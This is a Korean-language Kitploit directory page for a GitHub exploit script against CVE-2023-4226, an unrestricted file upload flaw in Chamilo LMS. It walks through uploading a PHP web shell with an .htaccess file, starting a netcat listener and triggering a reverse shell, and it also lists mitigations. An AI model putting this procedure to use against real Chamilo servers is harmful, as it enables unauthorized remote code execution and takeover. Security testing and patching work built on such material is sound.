Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-4226 — **Chamilo LMS**(<= v1.11.24)에서의 무제한 파일 업로드 취약점. | Kitploit
도구/GitHubGitHub/skyw4r33x/cve-2023-4226
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubskyw4r33x/cve-2023-4226

CVE-2023-4226

**Chamilo LMS**(<= v1.11.24)에서의 무제한 파일 업로드 취약점.

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛠️ Chamilo LMS용 CVE-2023-4226 악용

📋 설명

CVE-2023-4226 악용을 자동화하는 Python 스크립트로, Chamilo LMS (<= v1.11.24)의 무제한 파일 업로드 취약점입니다. PentesterMonkey 기반 PHP 웹 셸을 업로드하고 .htaccess를 구성하여 리버스 셸을 획득합니다. 자세한 내용: STAR Labs 권고.

🔍 취약점

  • 제품: Chamilo LMS
  • 심각도: 높음 (CVSS 3.1: 8.8)
  • 영향받는 버전: <= v1.11.24
  • 설명: 학습자 역할을 가진 사용자는 /main/inc/ajax/work.ajax.php에 PHP 파일을 업로드하여 RCE를 달성할 수 있습니다.
  • CWE: CWE-434 (위험한 파일 업로드)

🚀 기능

  1. 요청:
    • 대상 URL.
    • 세션 쿠키 (ch_sid).
    • 리버스 셸용 공격자 IP 및 포트.
  2. 수정 rce.php에 IP 및 포트 반영.
  3. 실행:
    • /main/work/work.php?cidReq=HW에 GET 요청.
    • /main/inc/ajax/work.ajax.php에 POST 요청으로 rce.php 및 .htaccess 업로드.
  4. 표시 웹 셸 URL (/app/cache/rce.php).

📦 요구 사항

  • Python: requests, colorama.

    root@kitploit:~
    pip install requests colorama
    
    
  • 파일: rce.php (PentesterMonkey, 저장소에 포함), .htaccess (스크립트로 생성).

  • 네트워크: 리스너용 IP 및 포트 (예: nc -lvnp 4444).

🛠️ 사용법

  1. 저장소를 클론합니다:

    root@kitploit:~
    git clone https://github.com/SkyW4r33x/CVE-2023-4226
    cd CVE-2023-4226    
    
  2. 스크립트에 실행 권한을 부여합니다:

    root@kitploit:~
    chmod +x CVE-2023-4226.py    
    
  3. 의존성을 설치합니다:

    root@kitploit:~
    pip install requests colorama    
    
  4. 터미널에서 리스너를 시작합니다:

    root@kitploit:~
    nc -lvnp 4444    
    
  5. 스크립트를 실행합니다:

    root@kitploit:~
    ./CVE-2023-4226.py    
    
  6. 입력합니다:

    • Chamilo의 URL.
    • 쿠키 ch_sid.
    • 리스너의 IP 및 포트.
  7. 리버스 셸을 시작하려면 웹 셸에 접속합니다:

    root@kitploit:~
    http://<chamilo>/app/cache/rce.php    
    

    예: http://chamilo.local/app/cache/rce.php

🛡️ 완화 조치

  • Chamilo >= v1.11.26으로 업데이트합니다.

  • 파일 이름을 무해화합니다.

  • disable_dangerous_file()에서 HTML을 차단합니다.

  • .htaccess에 추가합니다:

    root@kitploit:~
    RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
    Header set X-Content-Type-Options nosniff    
    

⚠️ 법적 고지

승인된 테스트에만 사용하십시오. 무단 사용은 불법입니다.

🙌 크레딧

  • 취약점: Ngo Wei Lin (@Creastery), STAR Labs.
  • 스크립트: SkyW4r33x
도구 다운로드